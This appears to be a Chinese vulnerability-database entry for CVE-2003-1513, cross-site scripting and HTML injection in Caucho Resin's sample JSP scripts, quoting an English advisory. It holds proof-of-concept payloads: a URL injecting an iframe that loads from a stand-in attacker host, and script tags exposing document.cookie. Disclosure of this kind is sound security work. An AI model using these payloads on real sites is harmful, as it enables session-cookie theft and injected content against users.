Caucho Resin多个HTML注入和跨站脚本漏洞

Caucho Resin多个HTML注入和跨站脚本漏洞

漏洞ID 1107523 漏洞类型 跨站脚本
发布时间 2003-10-20 更新时间 2003-12-31
图片[1]-Caucho Resin多个HTML注入和跨站脚本漏洞-安全小百科CVE编号 CVE-2003-1513
图片[2]-Caucho Resin多个HTML注入和跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200312-357
漏洞平台 JSP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/23262
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-357
|漏洞详情
CauchoTechnologyResin2.0版本到2.1.2版本的示例脚本存在多个跨站脚本(XSS)漏洞。远程攻击者可以借助(1)env.jsp、(2)form.jsp、(3)session.jsp、(4)tictactoe.jsp的move参数或者guestbook.jsp的(5)名称或(6)注释栏来注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/8852/info

It has been reported that Caucho Resin is prone to multiple HTML Injection and cross-site scripting vulnerabilities in various scripts that may allow a remote attacker to cause hostile HTML or script code to be rendered in the browser of a user who follows a malicious link supplied by the attacker.

The affected scripts include env.jsp, form.jsp, session.jsp, and tictactoe.jsp. The 'name' and 'comment' fields of guestbook.jsp have been reported to be vulnerable to HTML injection. An attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of an unsuspecting user. Exploitation may also allow attackers to inject hostile HTML and script code into the sample guestbook.

Successful exploitation of these issues may allow an attacker to steal cookie-based credentials. Other attacks may also be possible.

Caucho Resin version 2.1 and prior have been reported to be prone to this issue, however other versions may be affected as well.

http://www.example.com:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
|参考资料

来源:XF
名称:resin-name-comment-xss(13460)
链接:http://xforce.iss.net/xforce/xfdb/13460
来源:BID
名称:8852
链接:http://www.securityfocus.com/bid/8852
来源:SECUNIA
名称:10031
链接:http://secunia.com/advisories/10031
来源:FULLDISC
名称:20031019CauchoResin2.x-CrossSiteScripting
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012361.html

相关推荐: Oracle Apache+WebDB Documented Backdoor Vulnerability

Oracle Apache+WebDB Documented Backdoor Vulnerability 漏洞ID 1103555 漏洞类型 Access Validation Error 发布时间 2000-12-19 更新时间 2000-12-19 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享